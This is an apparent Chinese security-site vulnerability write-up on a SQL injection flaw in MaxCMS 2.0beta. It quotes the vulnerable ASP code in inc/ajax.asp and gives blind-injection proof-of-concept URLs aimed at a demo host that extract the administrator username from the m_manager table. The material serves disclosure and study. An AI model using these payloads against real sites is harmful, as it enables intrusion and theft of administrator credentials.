首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

马克斯CMS2.0beta (maxcms)SQL注入漏洞


http://www.gipsky.com/
马克斯CMS2.0beta (maxcms)SQL注入漏洞





BY flyh4t



http://bbs.wolvez.org



关键字:首页-马克斯CMS2.0



这个系统是国内非常流行的视频点播系统,之前的1.5版本漏洞非常多,2.0版本在安全方面有所提高,但是依然有漏洞存在。



看代码







\inc\ajax.asp



dim action : action = getForm("action", "get")

response.Charset="gbk"



Select case action

case "newslist" : viewNewsList

case "newscontent" : viewNewsContent

case "digg","tread" : scoreVideo(action)

case "reporterr" : reportErr

case "hit" : updateHit

case else : main

End Select

terminateAllObjects



……



Sub scoreVideo(operType)

dim sql,id,digg,returnValue : id=getForm("id","get")

‘通过get方式获取id的值

if rCookie("maxcms2_score"&id)="ok" then die "havescore"

if isNul(id) then die "err"

'on error resume next

digg=conn.db("select m_digg from {pre}data where m_id="&id,"execute")(0)

‘ 参数id,没有过滤就带入sql语句进行查询

if err then digg=0 : err.clear()

if not isNum(id) then echoSaveStr "safe" else id=clng(id)

‘ 查询到digg,注意返回的内容

……利用就很简单了,构造sql语句提交(默认结构是m_manager,m_username,m_pwd,根据返回的内容判断就可以了。如果构造的语句是正确的,就返回类似警告



你提交的数据有非法字符,你的IP【xxxx】已被记录,操作



构造的语句不正确,则返回500

Poc :





正确的:

http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1 and (select top 1 asc(mid(m_username,1,1)) from m_manager)=97



不正确的:

http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1 and (select top 1 asc(mid(m_username,1,1)) from m_manager)=99其实随便找个注射工具跑一下就ok了
<< Google AdSense 账户最新申请方法汇总 SEO专家祝鹏:浅谈SEO操作思路及技巧 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号